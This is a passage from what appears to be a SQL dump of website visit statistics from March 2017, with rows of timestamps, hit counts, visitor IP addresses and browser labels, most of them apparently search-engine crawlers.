.132.161.37','other'),(92462,1489117797,1,1,0,0,'66.249.64.183','chrome'),(92463,1489117980,1,1,0,0,'51.255.65.81','other'),(92464,1489118355,1,0,1,0,'66.249.64.69',''),(92465,1489118411,1,1,0,0,'164.132.161.23','other'),(92466,1489119230,1,1,0,0,'51.255.65.90','other'),(92467,1489120717,1,1,0,0,'163.172.64.239','other'),(92468,1489120801,1,1,0,0,'51.255.65.61','other'),(92469,1489121408,1,1,0,0,'164.132.161.16','other'),(92470,1489122805,1,1,0,0,'164.132.161.44','other'),(92471,1489123173,1,0,1,0,'66.249.64.183',''),(92472,1489123767,1,1,0,0,'164.132.161.22','other'),(92473,1489123816,1,1,0,0,'164.132.161.59','other'),(92474,1489124119,1,1,0,0,'51.255.65.50','other'),(92475,1489124126,1,1,0,0,'91.196.178.70','firefox'),(92476,1489124231,1,1,0,0,'164.132.161.24','other'),(92477,1489125260,1,0,1,0,'40.77.167.15',''),(92478,1489126060,1,1,0,0,'66.249.93.14','chrome'),(92479,1489126309,1,1,0,0,'164.132.161.33','other'),(92480,1489127413,1,1,0,0,'51.255.65.24','other'),(92481,1489128132,1,1,0,0,'91.196.178.66','chrome'),(92482,1489128495,1,1,0,0,'163.172.69.178','other'),(92483,1489128771,1,1,0,0,'51.255.65.86','other'),(92484,1489129005,1,1,0,0,'51.255.65.2','other'),(92485,1489129587,1,0,1,0,'66.249.64.183',''),(92486,1489129903,1,1,0,0,'91.196.178.66','chrome'),(92487,1489129922,3,3,0,0,'95.134.202.18','firefox'),(92488,1489130512,1,1,0,0,'91.196.178.72','firefox'),(92489,1489131006,1,1,0,0,'46.200.159.221','firefox'),(92490,1489131017,1,1,0,0,'141.8.132.2','other'),(92491,1489131437,1,1,0,0,'178.93.243.205','chrome'),(92492,1489131781,1,1,0,0,'51.255.65.97','other'),(92493,1489132192,2,0,2,0,'66.249.64.179',''),(92494,1489132557,1,0,1,0,'66.249.64.187',''),(92495,1489133572,1,0,1,0,'157.55.39.126',''),(92496,1489133682,1,1,0,0,'66.249.64.183','chrome'),(92497,1489133929,1,0,1,0,'66.249.64.179',''),(92498,1489134277,1,1,0,0,'51.255.65.19','other'),(92499,1489134590,1,1,0,0,'66.249.64.69','chrome'),(92500,1489134985,1,1,0,0,'91.196.178.165','chrome'),(92501,1489135180,1,1,0,0,'51.255.65.83','other'),(92502,1489136296,1,1,0,0,'91.196.178.66','chrome'),(92503,1489137948,1,1,0,0,'51.255.65.44','other'),(92504,1489138131,7,7,0,0,'69.30.198.202','other'),(92505,1489138286,1,1,0,0,'91.196.178.72','firefox'),(92506,1489138770,1,0,1,0,'66.249.64.69',''),(92507,1489139129,1,1,0,0,'91.196.178.165','chrome'),(92508,1489139989,1,1,0,0,'51.255.65.70','other'),(92509,1489140738,1,1,0,0,'176.241.157.167','chrome'),(92510,1489141149,1,1,0,0,'164.132.161.8','other'),(92511,1489141150,1,0,1,0,'66.249.64.79',''),(92512,1489141845,1,1,0,0,'40.77.167.91','other'),(92513,1489142121,1,1,0,0,'91.196.177.46','chrome'),(92514,1489142446,1,1,0,0,'51.255.65.16','other'),(92515,1489142815,1,1,0,0,'82.145.221.216','other'),(92516,1489142900,1,1,0,0,'82.145.221.216','chrome'),(92517,1489142901,1,1,0,0,'82.145.221.216','opera'),(92518,1489143026,1,1,0,0,'51.255.65.94','other'),(92519,1489144463,1,0,1,0,'66.249.64.187',''),(92520,1489146126,1,1,0,0,'91.196.178.65','firefox'),(92521,1489146771,1,1,0,0,'91.196.178.130','firefox'),(92522,1489147318,1,1,0,0,'91.196.178.68','firefox'),(92523,1489147695,1,1,0,0,'164.132.161.80','other'),(92524,1489147876,1,1,0,0,'91.196.178.132','chrome'),(92525,1489148509,1,1,0,0,'91.196.177.26','chrome'),(92526,1489148656,1,1,0,0,'51.255.65.12','other'),(92527,1489149068,1,1,0,0,'82.145.221.242','chrome'),(92528,1489149738,1,1,0,0,'51.255.65.78','other'),(92529,1489149852,1,1,0,0,'91.196.177.46','firefox'),(92530,1489149876,1,0,1,0,'66.249.64.187',''),(92531,1489149904,1,1,0,0,'91.196.178.165','chrome'),(92532,1489150041,1,1,0,0,'217.23.11.65','chrome'),(92533,1489150111,2,2,0,0,'91.209.11.236','other'),(92534,1489150124,1,1,0,0,'164.132.161.39','other'),(92535,1489150144,1,1,0,0,'78.111.186.159','firefox'),(92536,1489150494,1,1,0,0,'180.76.15.151','other'),(92537,1489150794,1,1,0,0,'66.249.64.79','chrome'),(92538,1489151684,1,0,1,0,'66.249.64.69',''),(92539,1489151841,1,1,0,0,'46.219.253.56','chrome'),(92540,1489151946,1,1,0,0,'194.126.180.211','chrome'),(92541,1489152009,1,1,0,0,'164.132.161.15','other'),(92542,1489152287,1,0,1,0,'66.249.64.179',''),(92543,1489152387,1,1,0,0,'91.196.178.164','chrome'),(92544,1489152623,1,0,1,0,'66.249.64.183',''),(92545,1489153208,1,1,0,0,'163.172.64.179','other'),(92546,1489153272,1,0,1,0,'66.249.64.79',''),(92547,1489153643,1,1,0,0,'46.219.253.56','chrome'),(92548,1489153984,1,1,0,0,'178.215.163.207','chrome'),(92549,1489154112,1,0,1,0,'66.249.64.183',''),(92550,1489154229,1,1,0,0,'91.196.178.70','chrome'),(92551,1489154314,1,1,0,0,'91.196.178.66','firefox'),(92552,1489154542,1,1,0,0,'176.195.99.57','msie'),(92553,1489154587,1,1,0,0,'91.209.11.236','other'),(92554,1489155441,1,1,0,0,'46.219.253.56','chrome'),(92555,1489155908,1,1,0,0,'91.213.149.93','chrome'),(92556,1489155920,1,1,0,0,'46.201.242.237','firefox'),(92557,1489156398,1,1,0,0,'40.77.167.91','other'),(92558,1489156510,1,0,1,0,'66.249.64.74',''),(92559,1489156626,1,1,0,0,'51.255.65.89','other'),(92560,1489157241,1,1,0,0,'46.219.253.56','chrome'),(92561,1489157317,1,1,0,0,'164.132.161.25','other'),(92562,1489157507,1,0,1,0,'66.249.64.74',''),(92563,1489158451,1,1,0,0,'164.132.161.53','other'),(92564,1489158656,2,2,0,0,'91.209.11.236','other'),(92565,1489159041,1,1,0,0,'46.219.253.56','chrome'),(92566,1489159374,1,1,0,0,'66.249.64.74','chrome'),(92567,1489159376,1,1,0,0,'91.196.178.65','firefox'),(92568,1489160657,2,2,0,0,'91.209.11.236','other'),(92569,1489160841,1,1,0,0,'46.219.253.56','chrome'),(92570,1489160893,1,1,0,0,'164.132.161.42','other'),(92571,1489161170,1,1,0,0,'91.196.178.68','chrome'),(92572,1489162287,1,1,0,0,'8.29.198.35','other'),(92573,1489162290,1,1,0,0,'91.196.178.99','chrome'),(92574,1489162291,1,1,0,0,'66.249.93.158','chrome'),(92575,1489162301,1,1,0,0,'91.196.178.99','other'),(92576,1489162736,1,0,1,0,'66.249.64.69',''),(92577,1489162979,1,1,0,0,'66.249.64.138','chrome'),(92578,1489163115,1,1,0,0,'164.132.161.40','other'),(92579,1489163142,1,1,0,0,'207.46.13.81','other'),(92580,1489163594,1,1,0,0,'164.132.161.16','other'),(92581,1489163941,1,1,0,0,'207.46.13.28','other'),(92582,1489163951,1,1,0,0,'163.172.64.252','other'),(92583,1489164608,1,0,1,0,'66.249.64.69',''),(92584,1489165123,1,1,0,0,'164.132.161.53','other'),(92585,1489166039,1,1,0,0,'91.196.178.98','chrome'),(92586,1489166853,1,1,0,0,'164.132.161.36','other'),(92587,1489168303,1,0,1,0,'207.46.13.35',''),(92588,1489168444,1,1,0,0,'164.132.161.26','other'),(92589,1489168473,1,1,0,0,'51.255.65.73','other'),(92590,1489169169,2,2,0,0,'80.64.173.162','other'),(92591,1489169218,1,1,0,0,'130.180.216.207','firefox'),(92592,1489169260,1,0,1,0,'66.249.64.183',''),(92593,1489169785,1,1,0,0,'164.132.161.93','other'),(92594,1489171559,1,0,1,0,'66.249.64.187',''),(92595,1489173292,1,1,0,0,'176.195.100.123','opera'),(92596,1489174063,1,1,0,0,'52.39.161.15','chrome'),(92597,1489174220,1,1,0,0,'164.132.161.67','other'),(92598,1489175003,1,1,0,0,'46.48.13.161','chrome'),(92599,1489175540,1,1,0,0,'51.255.65.37','other'),(92600,1489178433,1,1,0,0,'66.249.64.79','chrome'),(92601,1489179655,1,1,0,0,'51.255.65.15','other'),(92602,1489180997,1,1,0,0,'164.132.161.3','other'),(92603,1489181308,1,1,0,0,'163.172.64.247','other'),(92604,1489181527,1,1,0,0,'164.132.161.30','other'),(92605,1489181820,1,1,0,0,'164.132.161.8','other'),(92606,1489183837,1,1,0,0,'51.255.65.64','other'),(92607,1489184574,4,4,0,0,'192.187.104.235','other'),(92608,1489185388,1,1,0,0,'164.132.161.53','other'),(92609,1489186516,1,1,0,0,'51.255.65.48','other'),(92610,1489187506,1,1,0,0,'180.76.15.20','other'),(92611,1489191356,1,1,0,0,'163.172.64.177','other'),(92612,1489192517,1,1,0,0,'163.172.64.191','other'),(92613,1489192551,1,1,0,0,'163.172.64.231','other'),(92614,1489193087,1,1,0,0,'51.255.65.3','other'),(92615,1489193514,1,0,1,0,'66.249.64.187',''),(92616,1489193874,1,1,0,0,'163.172.71.29','other'),(92617,1489194893,1,1,0,0,'163.172.64.252','other'),(92618,1489195097,1,1,0,0,'40.77.167.97','other'),(92619,1489197068,1,1,0,0,'163.172.71.21','other'),(92620,1489197754,1,1,0,0,'217.69.133.169','firefox'),(92621,1489200162,1,1,0,0,'51.255.65.88','other'),(92622,1489200837,1,1,0,0,'163.172.64.180','other'),(92623,1489200981,1,1,0,0,'51.255.65.36','other'),(92624,1489202809,1,1,0,0,'51.255.65.51','other'),(92625,1489203290,1,1,0,0,'66.249.64.183','chrome'),(92626,1489203885,1,1,0,0,'164.132.161.45','other'),(92627,1489203914,1,1,0,0,'51.255.65.74','other'),(92628,1489204100,1,1,0,0,'163.172.64.244','other'),(92629,1489204358,1,1,0,0,'164.132.161.13','other'),(92630,1489207067,1,1,0,0,'163.172.64.186','other'),(92631,1489208267,1,1,0,0,'51.255.65.7','other'),(92632,1489209111,1,1,0,0,'51.255.65.72','other'),(92633,1489209605,1,1,0,0,'164.132.161.85','other'),(92634,1489209813,1,1,0,0,'180.76.15.14','other'),(92635,1489209842,1,1,0,0,'51.255.65.58','other'),(92636,1489211189,1,0,1,0,'66.249.64.187',''),(92637,1489212710,1,1,0,0,'51.255.65.25','other'),(92638,1489213993,1,1,0,0,'164.132.161.65','other'),(92639,1489214052,1,1,0,0,'164.132.161.34','other'),(92640,1489214465,2,2,0,0,'95.213.141.126','opera'),(92641,1489214523,1,1,0,0,'93.127.96.80','chrome'),(92642,1489217162,1,0,1,0,'66.249.64.187',''),(92643,1489217539,1,1,0,0,'51.255.65.66','other'),(92644,1489219893,1,1,0,0,'193.194.127.217','firefox'),(92645,1489220580,1,1,0,0,'51.255.65.47','other'),(92646,1489220581,1,1,0,0,'51.255.65.31','other'),(92647,1489220731,2,2,0,0,'46.229.168.71','other'),(92648,1489220744,1,1,0,0,'46.229.168.72','other'),(92649,1489220757,2,2,0,0,'46.229.168.66','other'),(92650,1489220774,1,1,0,0,'46.229.168.69','other'),(92651,1489220785,1,1,0,0,'46.229.168.65','other'),(92652,1489220799,1,1,0,0,'46.229.168.75','other'),(92653,1489220841,1,1,0,0,'46.229.168.68','other'),(92654,1489220901,1,0,1,0,'40.77.167.100',''),(92655,1489221356,1,1,0,0,'66.249.93.91','chrome'),(92656,1489221706,1,1,0,0,'164.132.161.74','other'),(92657,1489223647,1,1,0,0,'95.132.132.222','firefox'),(92658,1489224047,1,1,0,0,'164.132.161.35','other'),(92659,1489225299,1,0,1,0,'68.180.230.114',''),(92660,1489225906,1,1,0,0,'51.255.65.84','other'),(92661,1489225936,1,1,0,0,'163.172.64.191','other'),(92662,1489226760,1,1,0,0,'31.128.252.146','chrome'),(92663,1489228479,1,1,0,0,'51.255.65.91','other'),(92664,1489228538,1,1,0,0,'51.255.65.72','other'),(92665,1489228899,1,1,0,0,'178.121.31.156','chrome'),(92666,1489228917,1,1,0,0,'130.193.51.14','other'),(92667,1489229005,1,1,0,0,'180.76.15.10','other'),(92668,1489229706,9,9,0,0,'5.9.80.133','other'),(92669,1489230434,1,1,0,0,'51.255.65.88','other'),(92670,1489231014,1,1,0,0,'180.76.15.141','other'),(92671,1489231210,1,1,0,0,'157.55.39.169','other'),(92672,1489232576,1,0,1,0,'40.77.167.97',''),(92673,1489233359,1,1,0,0,'51.255.65.16','other'),(92674,1489234365,1,1,0,0,'51.255.65.25','other'),(92675,1489235217,1,1,0,0,'176.195.124.19','msie'),(92676,1489235499,1,1,0,0,'66.102.9.25','chrome'),(92677,1489235505,1,1,0,0,'164.132.161.63','other'),(92678,1489236373,1,1,0,0,'51.255.65.15','other'),(92679,1489236680,1,1,0,0,'163.172.64.179','other'),(92680,1489237248,1,1,0,0,'164.132.161.62','other'),(92681,1489237393,1,1,0,0,'51.255.65.39','other'),(92682,1489237447,1,1,0,0,'101.109.62.156','firefox'),(92683,1489238330,1,1,0,0,'157.55.39.169','other'),(92684,1489239503,1,0,1,0,'66.249.64.187',''),(92685,1489241711,1,1,0,0,'141.8.142.58','other'),(92686,1489242088,1,1,0,0,'164.132.161.88','other'),(92687,1489242464,1,1,0,0,'164.132.161.57','other'),(92688,1489242800,1,1,0,0,'51.255.65.35','other'),(92689,1489242835,1,1,0,0,'164.132.161.20','other'),(92690,1489243569,1,1,0,0,'5.255.253.9','other'),(92691,1489244659,1,1,0,0,'51.255.65.54','other'),(92692,1489244909,1,1,0,0,'46.98.125.17','chrome'),(92693,1489245567,1,1,0,0,'178.92.251.86','firefox'),(92694,1489245875,1,1,0,0,'164.132.161.91','other'),(92695,1489245989,1,1,0,0,'51.255.65.56','other'),(92696,1489246655,1,1,0,0,'51.255.65.43','other'),(92697,1489246685,1,1,0,0,'51.255.65.60','other'),(92698,1489247030,1,1,0,0,'164.132.161.41','other'),(92699,1489248049,1,1,0,0,'163.172.64.230','other'),(92700,1489248981,1,1,0,0,'51.255.65.51','other'),(92701,1489250787,1,1,0,0,'92.112.125.237','chrome'),(92702,1489250825,1,1,0,0,'163.172.71.90','other'),(92703,1489251122,1,1,0,0,'40.77.167.100','other'),(92704,1489253225,1,1,0,0,'91.196.178.99','chrome'),(92705,1489254150,4,4,0,0,'62.210.103.36','other'),(92706,1489254524,1,1,0,0,'51.255.65.10','other'),(92707,1489255288,1,1,0,0,'93.78.232.189','chrome'),(92708,1489255593,1,1,0,0,'51.255.65.89','other'),(92709,1489256725,1,1,0,0,'91.196.178.39','chrome'),(92710,1489256776,1,1,0,0,'163.172.64.191','other'),(92711,1489257147,1,1,0,0,'91.196.178.163','chrome'),(92712,1489257317,1,1,0,0,'51.255.65.3','other'),(92713,1489257747,1,1,0,0,'51.255.65.68','other'),(92714,1489260439,1,0,1,0,'66.249.64.183',''),(92715,1489260650,1,1,0,0,'164.132.161.85','other'),(92716,1489262901,1,1,0,0,'180.76.15.146','other'),(92717,1489263843,1,1,0,0,'164.132.161.40','other'),(92718,1489264183,1,1,0,0,'163.172.64.220','other'),(92719,1489264524,1,1,0,0,'130.193.50.34','other'),(92720,1489264525,1,1,0,0,'141.8.142.175','other'),(92721,1489264751,2,2,0,0,'164.132.161.80','other'),(92722,1489266946,1,0,1,0,'66.249.64.183',''),(92723,1489267783,1,0,1,0,'40.77.167.66',''),(92724,1489269210,1,0,1,0,'40.77.167.98',''),(92725,1489270458,1,1,0,0,'164.132.161.61','other'),(92726,1489270834,1,1,0,0,'51.255.65.67','other'),(92727,1489271271,1,0,1,0,'66.249.64.187',''),(92728,1489271745,1,1,0,0,'164.132.161.57','other'),(92729,1489272104,1,1,0,0,'164.132.161.39','other'),(92730,1489272800,2,0,2,0,'66.249.64.183',''),(92731,1489272906,1,0,1,0,'66.249.64.61',''),(92732,1489273397,1,1,0,0,'66.249.64.183','chrome'),(92733,1489273416,4,4,0,0,'83.170.203.142','chrome'),(92734,1489273596,1,1,0,0,'51.255.65.25','other'),(92735,1489273615,1,1,0,0,'163.172.64.220','other'),(92736,1489273722,1,1,0,0,'40.77.167.137','other'),(92737,1489274342,2,2,0,0,'83.170.203.142','chrome'),(92738,1489276711,1,0,1,0,'66.249.64.187',''),(92739,1489277109,1,0,1,0,'66.249.64.183',''),(92740,1489277139,1,0,1,0,'66.249.64.61',''),(92741,1489277226,7,7,0,0,'83.170.203.142','chrome'),(92742,1489277328,2,0,2,0,'40.77.167.137',''),(92743,1489277856,1,0,1,0,'66.249.64.59',''),(92744,1489278175,2,2,0,0,'83.170.203.142','chrome'),(92745,1489278929,1,1,0,0,'164.132.161.7','other'),(92746,1489279316,1,1,0,0,'66.249.64.179','chrome'),(92747,1489279317,1,1,0,0,'66.249.64.57','chrome'),(92748,1489279759,1,0,1,0,'66.249.64.187',''),(92749,1489279805,1,0,1,0,'66.249.64.59',''),(92750,1489280060,1,0,1,0,'40.77.167.66',''),(92751,1489280185,1,1,0,0,'163.172.71.90','other'),(92752,1489280976,1,0,1,0,'66.249.64.183',''),(92753,1489281002,1,1,0,0,'66.249.64.183','chrome'),(92754,1489281240,1,0,1,0,'66.249.64.187',''),(92755,1489281527,1,1,0,0,'176.195.112.2','msie'),(92756,1489281856,1,0,1,0,'66.249.64.57',''),(92757,1489283667,1,1,0,0,'95.28.167.245','msie'),(92758,1489285011,1,0,1,0,'66.249.64.61',''),(92759,1489285209,1,0,1,0,'66.249.64.57',''),(92760,1489286132,1,0,1,0,'66.249.64.183',''),(92761,1489286231,1,0,1,0,'66.249.64.179',''),(92762,1489286529,1,1,0,0,'130.193.51.45','other'),(92763,1489286533,1,1,0,0,'130.193.51.43','other'),(92764,1489287341,1,1,0,0,'40.77.167.98','other'),(92765,1489287457,1,1,0,0,'37.110.70.90','msie'),(92766,1489287560,1,0,1,0,'66.249.64.57',''),(92767,1489288279,1,1,0,0,'95.28.84.164','msie'),(92768,1489288308,1,0,1,0,'66.249.64.183',''),(92769,1489289000,2,2,0,0,'83.170.203.142','chrome'),(92770,1489289161,1,1,0,0,'66.249.64.183','chrome'),(92771,1489290328,2,0,2,0,'66.249.64.179',''),(92772,1489290589,1,0,1,0,'66.249.64.187',''),(92773,1489290942,1,0,1,0,'66.249.64.57',''),(92774,1489291022,1,1,0,0,'164.132.161.26','other'),(92775,1489291592,1,1,0,0,'51.255.65.91','other'),(92776,1489291944,1,0,1,0,'66.249.64.179',''),(92777,1489292737,1,1,0,0,'51.255.65.15','other'),(92778,1489292819,1,0,1,0,'66.249.64.59',''),(92779,1489292901,1,1,0,0,'51.255.65.52','other'),(92780,1489293022,1,1,0,0,'163.172.71.55','other'),(92781,1489293822,1,0,1,0,'66.249.64.179',''),(92782,1489294014,1,1,0,0,'51.255.65.22','other'),(92783,1489294308,1,1,0,0,'51.255.65.81','other'),(92784,1489294757,2,0,2,0,'66.249.64.187',''),(92785,1489295314,1,1,0,0,'46.98.124.226','chrome'),(92786,1489295785,1,1,0,0,'195.211.23.206','other'),(92787,1489295794,1,1,0,0,'95.213.6.17','other'),(92788,1489295891,1,0,1,0,'66.249.64.59',''),(92789,1489295986,1,1,0,0,'180.76.15.154','other'),(92790,1489296820,2,0,2,0,'66.249.64.59',''),(92791,1489297100,1,1,0,0,'164.132.161.44','other'),(92792,1489299535,1,0,1,0,'66.249.64.179',''),(92793,1489299887,4,4,0,0,'83.170.203.142','chrome'),(92794,1489301197,1,1,0,0,'217.69.133.3','other'),(92795,1489301805,1,0,1,0,'66.249.64.179',''),(92796,1489302540,1,1,0,0,'51.255.65.5','other'),(92797,1489302615,1,1,0,0,'51.255.65.81','other'),(92798,1489303435,1,1,0,0,'217.69.133.221','other'),(92799,1489303555,2,0,2,0,'68.180.229.99',''),(92800,1489304085,2,0,2,0,'66.249.64.183',''),(92801,1489304305,1,1,0,0,'91.196.178.34','chrome'),(92802,1489304764,1,1,0,0,'66.249.93.157','chrome'),(92803,1489304794,1,0,1,0,'66.249.64.57',''),(92804,1489304862,1,0,1,0,'66.249.64.59',''),(92805,1489305517,1,1,0,0,'164.132.161.94','other'),(92806,1489305922,1,0,1,0,'66.249.64.179',''),(92807,1489305975,1,1,0,0,'164.132.161.51','other'),(92808,1489306063,1,1,0,0,'163.172.64.180','other'),(92809,1489307542,1,1,0,0,'164.132.161.10','other'),(92810,1489307865,1,1,0,0,'176.193.145.242','msie'),(92811,1489308395,1,0,1,0,'66.249.64.183',''),(92812,1489308746,1,1,0,0,'207.46.13.163','other'),(92813,1489309003,1,0,1,0,'66.249.64.57',''),(92814,1489309225,1,0,1,0,'66.249.64.61',''),(92815,1489309591,1,1,0,0,'193.194.127.217','firefox'),(92816,1489309743,1,1,0,0,'66.249.64.183','chrome'),(92817,1489309788,1,1,0,0,'66.249.64.179','chrome'),(92818,1489310370,74,74,0,0,'5.9.61.111','other'),(92819,1489310506,1,1,0,0,'163.172.64.237','other'),(92820,1489311595,1,1,0,0,'141.0.13.145','other'),(92821,1489311976,1,0,1,0,'66.249.64.183',''),(92822,1489311979,1,1,0,0,'51.255.65.60','other'),(92823,1489312215,1,0,1,0,'66.249.64.179',''),(92824,1489312593,1,1,0,0,'93.127.29.75','chrome'),(92825,1489312670,1,0,1,0,'66.249.64.187',''),(92826,1489313008,1,1,0,0,'94.179.21.216','chrome'),(92827,1489313059,2,0,2,0,'66.249.64.59',''),(92828,1489313128,2,0,2,0,'66.249.64.57',''),(92829,1489314058,1,0,1,0,'66.249.64.57',''),(92830,1489314111,1,0,1,0,'66.249.64.59',''),(92831,1489314297,1,1,0,0,'93.127.29.75','chrome'),(92832,1489314409,1,1,0,0,'164.132.161.35','other'),(92833,1489316428,1,1,0,0,'164.132.161.44','other'),(92834,1489317560,1,0,1,0,'66.249.64.59',''),(92835,1489317843,1,1,0,0,'51.255.65.66','other'),(92836,1489317871,1,1,0,0,'163.172.64.234','other'),(92837,1489317941,1,0,1,0,'66.249.64.61',''),(92838,1489319291,1,0,1,0,'66.249.64.57',''),(92839,1489319994,1,0,1,0,'66.249.64.187',''),(92840,1489321299,2,2,0,0,'37.73.228.137','chrome'),(92841,1489322980,1,0,1,0,'66.249.64.183',''),(92842,1489323113,1,0,1,0,'66.249.64.187',''),(92843,1489323387,1,1,0,0,'163.172.71.90','other'),(92844,1489324492,1,1,0,0,'163.172.64.232','other'),(92845,1489324702,1,1,0,0,'178.255.215.94','other'),(92846,1489324919,1,1,0,0,'51.255.65.37','other'),(92847,1489325095,1,1,0,0,'164.132.161.80','other'),(92848,1489326295,1,1,0,0,'66.249.64.183','chrome'),(92849,1489326380,1,0,1,0,'66.249.64.57',''),(92850,1489326424,1,0,1,0,'66.249.64.59',''),(92851,1489326440,1,1,0,0,'164.132.161.62','other'),(92852,1489329170,1,0,1,0,'66.249.64.59',''),(92853,1489330082,1,1,0,0,'93.78.232.189','chrome'),(92854,1489330341,1,1,0,0,'95.10.30.178','other'),(92855,1489331292,1,1,0,0,'51.255.65.31','other'),(92856,1489331363,1,1,0,0,'163.172.73.28','other'),(92857,1489331529,1,1,0,0,'51.255.65.4','other'),(92858,1489331574,1,0,1,0,'40.77.167.81',''),(92859,1489331889,1,0,1,0,'66.249.64.183',''),(92860,1489332370,2,2,0,0,'37.73.228.137','chrome'),(92861,1489332780,1,0,1,0,'66.249.64.187',''),(92862,1489332792,1,0,1,0,'66.249.64.59',''),(92863,1489332807,1,0,1,0,'66.249.64.179',''),(92864,1489334787,1,1,0,0,'46.188.61.218','opera'),(92865,1489335041,1,1,0,0,'51.255.65.45','other'),(92866,1489335343,1,0,1,0,'66.249.64.133',''),(92867,1489335515,1,1,0,0,'82.145.220.186','chrome'),(92868,1489335854,1,1,0,0,'188.163.74.129','chrome'),(92869,1489336448,1,1,0,0,'37.147.105.21','chrome'),(92870,1489337395,1,1,0,0,'164.132.161.94','other'),(92871,1489337705,1,0,1,0,'66.249.66.183',''),(92872,1489337755,1,0,1,0,'66.249.66.87',''),(92873,1489337758,1,1,0,0,'164.132.161.8','other'),(92874,1489337813,1,1,0,0,'164.132.161.48','other'),(92875,1489337875,2,0,2,0,'66.249.76.29',''),(92876,1489338561,1,1,0,0,'180.76.15.140','other'),(92877,1489338627,1,1,0,0,'109.173.25.162','opera'),(92878,1489339059,1,1,0,0,'91.196.178.71','firefox'),(92879,1489339192,1,1,0,0,'163.172.71.21','other'),(92880,1489339196,1,0,1,0,'66.249.76.29',''),(92881,1489339244,1,1,0,0,'51.255.65.84','other'),(92882,1489339689,1,1,0,0,'164.132.161.54','other'),(92883,1489339966,1,0,1,0,'66.249.66.87',''),(92884,1489340350,1,1,0,0,'37.55.59.187','chrome'),(92885,1489340380,1,1,0,0,'5.255.253.47','other'),(92886,1489340805,2,2,0,0,'144.76.4.148','other'),(92887,1489340838,1,0,1,0,'66.249.76.30',''),(92888,1489341438,1,1,0,0,'130.180.216.12','chrome'),(92889,1489341528,1,1,0,0,'95.27.242.68','opera'),(92890,1489342515,1,1,0,0,'46.242.76.106','opera'),(92891,1489342900,1,1,0,0,'40.77.167.81','other'),(92892,1489342902,2,2,0,0,'37.73.227.132','chrome'),(92893,1489343050,1,1,0,0,'164.132.161.39','other'),(92894,1489344085,1,1,0,0,'163.172.64.250','other'),(92895,1489344214,1,1,0,0,'46.219.253.56','chrome'),(92896,1489345436,1,1,0,0,'51.255.65.20','other'),(92897,1489346019,1,1,0,0,'109.236.91.79','chrome'),(92898,1489347608,1,1,0,0,'95.132.135.6','firefox'),(92899,1489348189,1,1,0,0,'5.255.253.26','other'),(92900,1489350176,1,0,1,0,'66.249.76.108',''),(92901,1489351190,2,0,2,0,'66.249.76.108',''),(92902,1489352936,1,0,1,0,'66.249.66.81',''),(92903,1489353383,1,1,0,0,'40.77.167.98','other'),(92904,1489353954,1,0,1,0,'66.249.66.84',''),(92905,1489356366,1,1,0,0,'164.132.161.70','other'),(92906,1489356806,1,1,0,0,'164.132.161.65','other'),(92907,1489356991,1,1,0,0,'130.193.50.34','other'),(92908,1489356996,1,1,0,0,'141.8.142.175','other'),(92909,1489357772,1,1,0,0,'164.132.161.22','other'),(92910,1489357847,1,1,0,0,'217.69.133.3','other'),(92911,1489358497,1,0,1,0,'66.249.76.109',''),(92912,1489358559,1,1,0,0,'46.242.125.81','opera'),(92913,1489358920,1,1,0,0,'163.172.64.185','other'),(92914,1489359851,1,1,0,0,'51.255.65.79','other'),(92915,1489360002,1,0,1,0,'66.249.76.108',''),(92916,1489360381,1,0,1,0,'66.249.76.30',''),(92917,1489361898,1,0,1,0,'66.249.76.107',''),(92918,1489362512,1,1,0,0,'66.249.76.30','chrome'),(92919,1489362513,1,1,0,0,'66.249.76.108','chrome'),(92920,1489363612,1,1,0,0,'195.138.94.240','chrome'),(92921,1489366527,1,0,1,0,'66.249.76.107',''),(92922,1489367003,1,0,1,0,'66.249.76.30',''),(92923,1489367693,1,1,0,0,'164.132.161.55','other'),(92924,1489367824,1,1,0,0,'164.132.161.61','other'),(92925,1489367947,1,1,0,0,'80.64.173.162','other'),(92926,1489368448,1,1,0,0,'40.77.167.81','other'),(92927,1489368794,1,0,1,0,'40.77.167.98',''),(92928,1489369590,1,1,0,0,'51.255.65.86','other'),(92929,1489369733,1,1,0,0,'141.8.132.52','other'),(92930,1489369759,1,1,0,0,'141.8.142.155','other'),(92931,1489369762,1,1,0,0,'5.255.253.53','other'),(92932,1489369765,1,1,0,0,'93.158.152.40','other'),(92933,1489369769,1,1,0,0,'141.8.142.167','other'),(92934,1489369772,1,1,0,0,'5.255.253.10','other'),(92935,1489369775,1,1,0,0,'93.158.152.26','other'),(92936,1489369778,1,1,0,0,'141.8.184.11','other'),(92937,1489369799,1,1,0,0,'141.8.132.76','other'),(92938,1489370382,1,1,0,0,'40.77.167.33','other'),(92939,1489370413,1,1,0,0,'217.69.133.216','other'),(92940,1489370984,1,0,1,0,'66.249.66.180',''),(92941,1489371012,3,3,0,0,'80.64.173.162','other'),(92942,1489371318,1,0,1,0,'66.249.66.84',''),(92943,1489371637,1,1,0,0,'130.193.37.21','other'),(92944,1489371640,1,1,0,0,'141.8.142.153','other'),(92945,1489372340,1,1,0,0,'141.8.184.11','other'),(92946,1489373150,1,0,1,0,'66.249.76.108',''),(92947,1489373441,1,1,0,0,'51.255.65.65','other'),(92948,1489373550,1,1,0,0,'93.158.152.84','other'),(92949,1489373553,1,1,0,0,'178.154.189.37','other'),(92950,1489374794,1,0,1,0,'66.249.76.30',''),(92951,1489375463,1,1,0,0,'5.255.253.9','other'),(92952,1489375466,1,1,0,0,'141.8.142.61','other'),(92953,1489375469,1,1,0,0,'141.8.142.88','other'),(92954,1489376629,1,0,1,0,'66.249.76.109',''),(92955,1489377094,1,0,1,0,'66.249.76.107',''),(92956,1489377374,1,1,0,0,'93.158.152.26','other'),(92957,1489377755,1,1,0,0,'164.132.161.80','other'),(92958,1489378430,1,1,0,0,'180.76.15.34','other'),(92959,1489378502,1,1,0,0,'51.255.65.26','other'),(92960,1489379277,1,1,0,0,'141.8.142.88','other'),(92961,1489379305,1,1,0,0,'51.255.65.20','other'),(92962,1489379483,1,0,1,0,'66.249.66.177',''),(92963,1489380565,1,0,1,0,'66.249.66.87',''),(92964,1489380971,1,0,1,0,'66.249.76.28',''),(92965,1489381023,1,1,0,0,'163.172.64.186','other'),(92966,1489383149,1,1,0,0,'51.255.65.46','other'),(92967,1489383260,1,1,0,0,'51.255.65.47','other'),(92968,1489383499,1,1,0,0,'91.196.178.69','firefox'),(92969,1489384184,1,1,0,0,'66.249.93.158','chrome'),(92970,1489384498,1,1,0,0,'91.121.97.49','other'),(92971,1489384906,1,1,0,0,'164.132.161.82','other'),(92972,1489385058,1,0,1,0,'66.249.76.29',''),(92973,1489385181,1,1,0,0,'91.196.178.33','firefox'),(92974,1489385519,1,1,0,0,'164.132.161.55','other'),(